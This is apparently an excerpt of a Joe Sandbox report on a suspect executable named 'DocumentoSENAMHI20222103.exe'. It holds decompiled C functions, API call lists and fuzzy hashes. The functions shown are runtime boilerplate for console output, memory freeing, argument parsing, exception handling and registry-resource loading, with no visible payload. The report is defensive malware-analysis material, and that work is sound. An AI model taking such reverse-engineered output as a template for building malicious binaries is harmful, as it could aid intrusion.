    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 949b10aa69a7f444b53de70d2c5b69b4d51d6559b1c821fdca1573e5bd01413c
    • Instruction ID: 99c4333eb735197b56a79dac6a5a688341cc0c1a8d2a2e42929e7ed8c07c6b34
    • Opcode Fuzzy Hash: 949b10aa69a7f444b53de70d2c5b69b4d51d6559b1c821fdca1573e5bd01413c
    • Instruction Fuzzy Hash: 09118632208101FB9A1126B4AD85E2B335DDBD17BBF25022CFD389E5D1DF618C4D9112
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0015F486(void* _a4, long _a8, DWORD* _a12) {
    				void* _t13;
    
    				_t13 = WriteConsoleW( *0x169860, _a4, _a8, _a12, 0);
    				if(_t13 == 0 && GetLastError() == 6) {
    					E0015F46F();
    					E0015F431();
    					_t13 = WriteConsoleW( *0x169860, _a4, _a8, _a12, _t13);
    				}
    				return _t13;
    			}





    APIs
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0015E629,?,00000001,?,?,?,0015D89C,?,00000000,?), ref: 0015F49D
    • GetLastError.KERNEL32(?,0015E629,?,00000001,?,?,?,0015D89C,?,00000000,?,?,?,?,0015DDE8,00000000), ref: 0015F4A9
      • Part of subcall function 0015F46F: CloseHandle.KERNEL32(FFFFFFFE,0015F4B9,?,0015E629,?,00000001,?,?,?,0015D89C,?,00000000,?,?,?), ref: 0015F47F
    • ___initconout.LIBCMT ref: 0015F4B9
      • Part of subcall function 0015F431: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0015F460,0015E616,?,?,0015D89C,?,00000000,?,?), ref: 0015F444
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0015E629,?,00000001,?,?,?,0015D89C,?,00000000,?,?), ref: 0015F4CE
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 3a02ae91eb1ecfb3ad132e743ed2e669961f42edb3379d02f1d811db3afdd447
    • Instruction ID: 82c1c0d126ea5157ac1a723ac7e29b35eb072831ca3af8620b1cd1b5f6d32c6d
    • Opcode Fuzzy Hash: 3a02ae91eb1ecfb3ad132e743ed2e669961f42edb3379d02f1d811db3afdd447
    • Instruction Fuzzy Hash: D9F01236400128FBCF122FD1DC0498A3F6AFB153B2B144128FE28D9530C77188A1DBD0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E001585AB() {
    
    				E00158B82( *0x292954);
    				 *0x292954 = 0;
    				E00158B82( *0x292958);
    				 *0x292958 = 0;
    				E00158B82( *0x292db0);
    				 *0x292db0 = 0;
    				E00158B82( *0x292db4);
    				 *0x292db4 = 0;
    				return 1;
    			}




    APIs
    • _free.LIBCMT ref: 001585B4
      • Part of subcall function 00158B82: HeapFree.KERNEL32(00000000,00000000,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?), ref: 00158B98
      • Part of subcall function 00158B82: GetLastError.KERNEL32(?,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?,?), ref: 00158BAA
    • _free.LIBCMT ref: 001585C7
    • _free.LIBCMT ref: 001585D8
    • _free.LIBCMT ref: 001585E9
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 13beff986658b53cc7eed724efb3f4293d0bc09119b94d6f65647876dde5d68c
    • Instruction ID: 9ec68a8dd339d176311eda682984fc04a22dddf44fe982939661e5aa95197e01
    • Opcode Fuzzy Hash: 13beff986658b53cc7eed724efb3f4293d0bc09119b94d6f65647876dde5d68c
    • Instruction Fuzzy Hash: 22E0ECB19261A1FE9A066F19FD19C893F6DF764722B55010BFC202A231CB350A5F9FE1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00157CE5(void* __edx, intOrPtr _a4) {
    				signed int _v8;
    				void* _v12;
    				char _v16;
    				char* _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char* _t26;
    				intOrPtr* _t36;
    				signed int _t37;
    				signed int _t40;
    				char _t42;
    				signed int _t43;
    				intOrPtr* _t44;
    				intOrPtr* _t45;
    				intOrPtr _t48;
    				signed int _t49;
    				signed int _t54;
    				void* _t57;
    				intOrPtr* _t58;
    				signed int _t64;
    				signed int _t66;
    
    				_t57 = __edx;
    				_t48 = _a4;
    				if(_t48 != 0) {
    					__eflags = _t48 - 2;
    					if(_t48 == 2) {
    						L5:
    						E0015AD73(_t48);
    						E0015A7BA(_t48, _t57, 0, 0x2927f8, 0, 0x2927f8, 0x104);
    						_t26 =  *0x292db8; // 0xa033e8
    						 *0x292da8 = 0x2927f8;
    						_v20 = _t26;
    						__eflags = _t26;
    						if(_t26 == 0) {
    							L7:
    							_t26 = 0x2927f8;
    							_v20 = 0x2927f8;
    							L8:
    							_v8 = 0;
    							_v16 = 0;
    							_t64 = E00157F8F(E00157E1B( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
    							__eflags = _t64;
    							if(__eflags != 0) {
    								E00157E1B( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
    								__eflags = _t48 - 1;
    								if(_t48 != 1) {
    									_v12 = 0;
    									_push( &_v12);
    									_t49 = E0015A6AD(_t64, _t64);
    									__eflags = _t49;
    									if(_t49 == 0) {
    										_t58 = _v12;
    										_t54 = 0;
    										_t36 = _t58;
    										__eflags =  *_t58;
    										if( *_t58 == 0) {
    											L17:
    											_t37 = 0;
    											 *0x292dac = _t54;
    											_v12 = 0;
    											_t49 = 0;
    											 *0x292db0 = _t58;
    											L18:
    											E00158B82(_t37);
    											_v12 = 0;
    											L19:
    											E00158B82(_t64);
    											_t40 = _t49;
    											L20:
    											return _t40;
    										} else {
    											goto L16;
    										}
    										do {
    											L16:
    											_t36 = _t36 + 4;
    											_t54 = _t54 + 1;
    											__eflags =  *_t36;
    										} while ( *_t36 != 0);
    										goto L17;
    									}
    									_t37 = _v12;
    									goto L18;
    								}
    								_t42 = _v8 - 1;
    								__eflags = _t42;
    								 *0x292dac = _t42;
    								_t43 = _t64;
    								_t64 = 0;
    								 *0x292db0 = _t43;
    								L12:
    								_t49 = 0;
    								goto L19;
    							}
    							_t44 = E001575D4(__eflags);
    							_push(0xc);
    							_pop(0);
    							 *_t44 = 0;
    							goto L12;
    						}
    						__eflags =  *_t26;
    						if( *_t26 != 0) {
    							goto L8;
    						}
    						goto L7;
    					}
    					__eflags = _t48 - 1;
    					if(__eflags == 0) {
    						goto L5;
    					}
    					_t45 = E001575D4(__eflags);
    					_t66 = 0x16;
    					 *_t45 = _t66;
    					E0015748C();
    					_t40 = _t66;
    					goto L20;
    				}
    				return 0;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID:
    • String ID: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
    • API String ID: 0-3192360390
    • Opcode ID: 91124560bb36b8d5c8a74a5ecdf7c828f98c0d7e338284200fe92ee8a97e30d9
    • Instruction ID: 421f37c7824bee466a3f8279ee3990cd6e48c99e087ee8827e642a679ac912c4
    • Opcode Fuzzy Hash: 91124560bb36b8d5c8a74a5ecdf7c828f98c0d7e338284200fe92ee8a97e30d9
    • Instruction Fuzzy Hash: EF413671A08214EFCB15DF99AC869AEBBB8EF95711B140466EC249B291D7704E48CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E001564B6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v28;
    				signed int _v36;
    				void* _v40;
    				intOrPtr _v44;
    				signed int _v48;
    				intOrPtr _v56;
    				void _v60;
    				signed char* _v68;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t74;
    				void* _t75;
    				char _t76;
    				signed char _t78;
    				signed int _t80;
    				signed char* _t81;
    				signed int _t82;
    				signed int _t83;
    				intOrPtr* _t87;
    				void* _t90;
    				signed char* _t93;
    				intOrPtr* _t96;
    				signed char _t97;
    				intOrPtr _t98;
    				intOrPtr _t99;
    				intOrPtr* _t101;
    				signed int _t102;
    				signed int _t103;
    				signed char _t108;
    				signed char* _t111;
    				signed int _t112;
    				void* _t113;
    				signed char* _t116;
    				void* _t121;
    				signed int _t123;
    				void* _t130;
    				void* _t131;
    
    				_t110 = __edx;
    				_t100 = __ecx;
    				_t96 = _a4;
    				if( *_t96 == 0x80000003) {
    					return _t74;
    				} else {
    					_push(_t121);
    					_push(_t113);
    					_t75 = E00155DCC(_t96, __ecx, __edx, _t113, _t121);
    					if( *((intOrPtr*)(_t75 + 8)) != 0) {
    						__imp__EncodePointer(0);
    						_t121 = _t75;
    						if( *((intOrPtr*)(E00155DCC(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
    							_t87 = E00154F23(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
    							_t130 = _t130 + 0x1c;
    							if(_t87 != 0) {
    								L16:
    								return _t87;
    							}
    						}
    					}
    					_t76 = _a20;
    					_v24 = _t76;
    					_v20 = 0;
    					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
    						_push(_a28);
    						E00154E56(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
    						_t112 = _v36;
    						_t131 = _t130 + 0x18;
    						_t87 = _v40;
    						_v16 = _t87;
    						_v8 = _t112;
    						if(_t112 < _v28) {
    							_t102 = _t112 * 0x14;
    							_v12 = _t102;
    							do {
    								_t103 = 5;
    								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
    								_t131 = _t131 + 0xc;
    								if(_v60 <= _t90 && _t90 <= _v56) {
    									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
    									_t108 = _t93[4];
    									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
    										if(( *_t93 & 0x00000040) == 0) {
    											_push(0);
    											_push(1);
    											E00156091(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
    											_t112 = _v8;
    											_t131 = _t131 + 0x30;
    										}
    									}
    								}
    								_t112 = _t112 + 1;
    								_t87 = _v16;
    								_t102 = _v12 + 0x14;
    								_v8 = _t112;
    								_v12 = _t102;
    							} while (_t112 < _v28);
    						}
    						goto L16;
    					}
    					E00158A26(_t96, _t100, _t110, 0, _t121);
    					asm("int3");
    					_t111 = _v68;
    					_push(_t96);
    					_push(_t121);
    					_push(0);
    					_t78 = _t111[4];
    					if(_t78 == 0) {
    						L41:
    						_t80 = 1;
    					} else {
    						_t101 = _t78 + 8;
    						if( *_t101 == 0) {
    							goto L41;
    						} else {
    							_t116 = _a4;
    							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
    								_t97 = _t116[4];
    								_t123 = 0;
    								if(_t78 == _t97) {
    									L33:
    									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
    										_t81 = _a8;
    										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
    											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
    												_t123 = 1;
    											}
    										}
    									}
    									_t80 = _t123;
    								} else {
    									_t59 = _t97 + 8; // 0x6e
    									_t82 = _t59;
    									while(1) {
    										_t98 =  *_t101;
    										if(_t98 !=  *_t82) {
    											break;
    										}
    										if(_t98 == 0) {
    											L29:
    											_t83 = _t123;
    										} else {
    											_t99 =  *((intOrPtr*)(_t101 + 1));
    											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
    												break;
    											} else {
    												_t101 = _t101 + 2;
    												_t82 = _t82 + 2;
    												if(_t99 != 0) {
    													continue;
    												} else {
    													goto L29;
    												}
    											}
    										}
    										L31:
    										if(_t83 == 0) {
    											goto L33;
    										} else {
    											_t80 = 0;
    										}
    										goto L42;
    									}
    									asm("sbb eax, eax");
    									_t83 = _t82 | 0x00000001;
    									goto L31;
    								}
    							} else {
    								goto L41;
    							}
    						}
    					}
    					L42:
    					return _t80;
    				}
    			}

    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001564DB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: EncodePointer
    • String ID: MOC$RCC
    • API String ID: 2118026453-2084237596
    • Opcode ID: 955f7b55ad13c35c5badf6a8ff3c21dbeff77165cdadf8dfd665e4804778a67b
    • Instruction ID: 1673c18a6da0d20b54d52b6c57f29e2a04742a82df57ee3df9bb37f0abce520a
    • Opcode Fuzzy Hash: 955f7b55ad13c35c5badf6a8ff3c21dbeff77165cdadf8dfd665e4804778a67b
    • Instruction Fuzzy Hash: E0417971900209EFCF15CFA8CC81AAEBBB5FF08345F188199FD256B265E3359A54CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E00152C50(CHAR* __ebx, CHAR** __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
    				signed int _v8;
    				char _v4104;
    				signed int _v4108;
    				intOrPtr _v4112;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t29;
    				char _t38;
    				char* _t52;
    				intOrPtr* _t60;
    				void* _t63;
    				intOrPtr* _t64;
    				void* _t65;
    				char _t66;
    				signed int _t67;
    				signed int _t68;
    				void* _t69;
    
    				_t69 = __eflags;
    				_t63 = __edx;
    				_t51 = __ebx;
    				E001602C0(0x100c);
    				_t29 =  *0x169008; // 0x26a91022
    				_v8 = _t29 ^ _t68;
    				_v4108 = _v4108 & 0x00000000;
    				_t64 = __ecx;
    				_t66 = E001529E8(__ebx, __ecx, __ecx, _t65, _t69, _a4,  &_v4108);
    				if(_t66 >= 0) {
    					_push(__ebx);
    					_t52 = _v4108;
    					 *((intOrPtr*)(__ecx)) = _t52;
    					if( *_t52 != 0) {
    						while(1) {
    							_t66 = E00152327(_t64,  &_v4104);
    							if(_t66 < 0) {
    								goto L7;
    							}
    							_t67 = 0;
    							while(lstrcmpiA( &_v4104,  *(0x1661b0 + _t67 * 8)) != 0) {
    								_t67 = _t67 + 1;
    								if(_t67 < 0xe) {
    									continue;
    								} else {
    									L6:
    									_t66 = 0x80020009;
    								}
    								goto L7;
    							}
    							_t38 =  *((intOrPtr*)(0x1661b4 + _t67 * 8));
    							_v4108 = _t38;
    							__eflags = _t38;
    							if(_t38 == 0) {
    								goto L6;
    							} else {
    								_t66 = E00152327(_t64,  &_v4104);
    								__eflags = _t66;
    								if(_t66 < 0) {
    									goto L7;
    								} else {
    									__eflags = _v4104 - 0x7b;
    									if(_v4104 != 0x7b) {
    										goto L6;
    									} else {
    										__eflags = _a8;
    										_t60 = _t64;
    										_push(0);
    										if(_a8 == 0) {
    											_push(0);
    											_push(_v4108);
    											_push( &_v4104);
    											_t66 = E00152DA0(_t60, _t63);
    											__eflags = _t66;
    											if(_t66 < 0) {
    												goto L7;
    											} else {
    												goto L16;
    											}
    										} else {
    											_push(_a8);
    											_push(_v4108);
    											_v4112 =  *_t64;
    											_push( &_v4104);
    											_t66 = E00152DA0(_t60, _t63);
    											__eflags = _t66;
    											if(_t66 >= 0) {
    												L16:
    												E001522FE(_t64);
    												__eflags =  *((char*)( *_t64));
    												if( *((char*)( *_t64)) != 0) {
    													continue;
    												} else {
    													goto L7;
    												}
    											} else {
    												 *_t64 = _v4112;
    												E00152DA0(_t64, _t63,  &_v4104, _v4108, 0, 0);
    												goto L7;
    											}
    										}
    									}
    								}
    							}
    							L18:
    						}
    					}
    					L7:
    					__imp__CoTaskMemFree();
    					_t32 = _t66;
    					_t51 = _t52;
    				}
    				return E0015403C(_t32, _t51, _v8 ^ _t68, _t63, _t64, _t66);
    				goto L18;
    			}

    APIs
      • Part of subcall function 001529E8: __EH_prolog3_GS.LIBCMT ref: 001529EF
      • Part of subcall function 001529E8: _strlen.LIBCMT ref: 00152A14
      • Part of subcall function 001529E8: CoTaskMemAlloc.OLE32(00000000,00000040,00152C84,?,00000000,00000000,?), ref: 00152A2E
      • Part of subcall function 001529E8: CoTaskMemFree.OLE32(?), ref: 00152C39
    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000000,?), ref: 00152CD2
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015235A
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015236A
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152379
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152383
      • Part of subcall function 00152327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 001523D5
    • lstrcmpiA.KERNEL32(?,?,00000000,?,00000000,00000000,?), ref: 00152CBC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: CharNext$Task$Free$AllocH_prolog3__strlenlstrcmpi
    • String ID: {
    • API String ID: 200014448-366298937
    • Opcode ID: 068b65584c1b222ff9a8bf64648d61dc112396956ee301d591127ab391f5fecd
    • Instruction ID: e9ef2d7e0590f34a60bad0cdb085f91370798c22eaa36ea47ba6cef279cd3122
    • Opcode Fuzzy Hash: 068b65584c1b222ff9a8bf64648d61dc112396956ee301d591127ab391f5fecd
    • Instruction Fuzzy Hash: 65319536E002A5DBCB239B64CC54BDEBBB4AB4A312F044195ED59EB241D7B4DDC8CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00151DBF(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
    				void* _t16;
    				void* _t20;
    				void* _t21;
    				void* _t28;
    				void* _t29;
    				intOrPtr* _t42;
    				void* _t43;
    				void* _t44;
    				void* _t45;
    
    				_t40 = __edi;
    				_push(0x10);
    				E00160216(0x1607fb, __ebx, __edi, __esi);
    				_t28 = __edx;
    				 *((intOrPtr*)(_t43 - 0x1c)) = __ecx;
    				_t42 = 0;
    				 *((intOrPtr*)(_t43 - 0x18)) = 0;
    				 *((intOrPtr*)(_t43 - 4)) = 0;
    				_t15 = E001575E7(L"REGISTRY") + 1;
    				 *((intOrPtr*)(_t43 - 0x14)) = E001575E7(L"REGISTRY") + 1;
    				_t16 = E00151181(_t43 - 0x14, _t15);
    				_t45 = _t44 + 4;
    				if(_t16 < 0) {
    					L7:
    					_t29 = 0x8007000e;
    				} else {
    					_t40 =  *((intOrPtr*)(_t43 - 0x14));
    					_t49 = _t40 - 0x400;
    					if(_t40 > 0x400 || E001511AE(_t28, _t40, _t40, 0, _t49) == 0) {
    						_t20 = E00153CD7(_t43 - 0x18, _t42, _t40);
    						_t42 =  *((intOrPtr*)(_t43 - 0x18));
    					} else {
    						E001602F0(_t40);
    						_t20 = _t45;
    					}
    					_t21 = E00151251(_t20, L"REGISTRY", _t40, 3);
    					_t51 = _t21;
    					if(_t21 == 0) {
    						goto L7;
    					} else {
    						_t29 = E00151B39(_t28,  *((intOrPtr*)(_t43 - 0x1c)), _t40, _t42, _t51, _t28,  *(_t43 + 8) & 0x0000ffff, _t21, 1);
    					}
    				}
    				if(_t42 != 0) {
    					do {
    						_t40 =  *_t42;
    						_t42 = _t40;
    						E00157188(_t42);
    					} while (_t40 != 0);
    				}
    				return E001601C5(_t29, _t40, _t42);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00151DC6
      • Part of subcall function 001511AE: __alloca_probe_16.LIBCMT ref: 001511D1
    • __alloca_probe_16.LIBCMT ref: 00151E0F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: __alloca_probe_16$H_prolog3_
    • String ID: REGISTRY
    • API String ID: 2219512784-194740550
    • Opcode ID: d6c6151a3d16bd2b6839709260d16e16f34457130aa571b1bbb07d0f95840221
    • Instruction ID: 9829658784dc7aa4e54e3e518beedb65d301bfd1feb5c8cd4b82892cc8914998
    • Opcode Fuzzy Hash: d6c6151a3d16bd2b6839709260d16e16f34457130aa571b1bbb07d0f95840221
    • Instruction Fuzzy Hash: 52119432F40215EBCB13AAA48C837FF72659F98701F154419BE21BF281EB749D5987D0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00151F97(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
    				void* _t17;
    				void* _t21;
    				void* _t22;
    				void* _t29;
    				void* _t30;
    				intOrPtr* _t43;
    				void* _t44;
    				void* _t45;
    				void* _t46;
    
    				_t41 = __edi;
    				_push(0x10);
    				E00160216(0x1607fb, __ebx, __edi, __esi);
    				_t29 = __edx;
    				 *((intOrPtr*)(_t44 - 0x1c)) = __ecx;
    				_t43 = 0;
    				 *((intOrPtr*)(_t44 - 0x18)) = 0;
    				 *(_t44 - 4) =  *(_t44 - 4) & 0;
    				_t16 = E001575E7(L"REGISTRY") + 1;
    				 *((intOrPtr*)(_t44 - 0x14)) = E001575E7(L"REGISTRY") + 1;
    				_t17 = E00151181(_t44 - 0x14, _t16);
    				_t46 = _t45 + 4;
    				if(_t17 < 0) {
    					L7:
    					_t30 = 0x8007000e;
    				} else {
    					_t41 =  *((intOrPtr*)(_t44 - 0x14));
    					_t50 = _t41 - 0x400;
    					if(_t41 > 0x400 || E001511AE(_t29, _t41, _t41, 0, _t50) == 0) {
    						_t21 = E00153CD7(_t44 - 0x18, _t43, _t41);
    						_t43 =  *((intOrPtr*)(_t44 - 0x18));
    					} else {
    						E001602F0(_t41);
    						_t21 = _t46;
    					}
    					_t22 = E00151251(_t21, L"REGISTRY", _t41, 3);
    					_t52 = _t22;
    					if(_t22 == 0) {
    						goto L7;
    					} else {
    						_t30 = E00151B39(_t29,  *((intOrPtr*)(_t44 - 0x1c)), _t41, _t43, _t52, _t29,  *(_t44 + 8) & 0x0000ffff, _t22, 0);
    					}
    				}
    				if(_t43 != 0) {
    					do {
    						_t41 =  *_t43;
    						_t43 = _t41;
    						E00157188(_t43);
    					} while (_t41 != 0);
    				}
    				return E001601C5(_t30, _t41, _t43);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00151F9E
      • Part of subcall function 001511AE: __alloca_probe_16.LIBCMT ref: 001511D1
    • __alloca_probe_16.LIBCMT ref: 00151FE7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: __alloca_probe_16$H_prolog3_
    • String ID: REGISTRY
    • API String ID: 2219512784-194740550
    • Opcode ID: 9c7e19a5338605abdc57f869063b7331578c7fb78a5585c2736d81a5d6a29a72
    • Instruction ID: 6037a4936f3f21d237a4b73ec50eb7e978d79b9cddcedd7952c75b234a82ffd6
    • Opcode Fuzzy Hash: 9c7e19a5338605abdc57f869063b7331578c7fb78a5585c2736d81a5d6a29a72
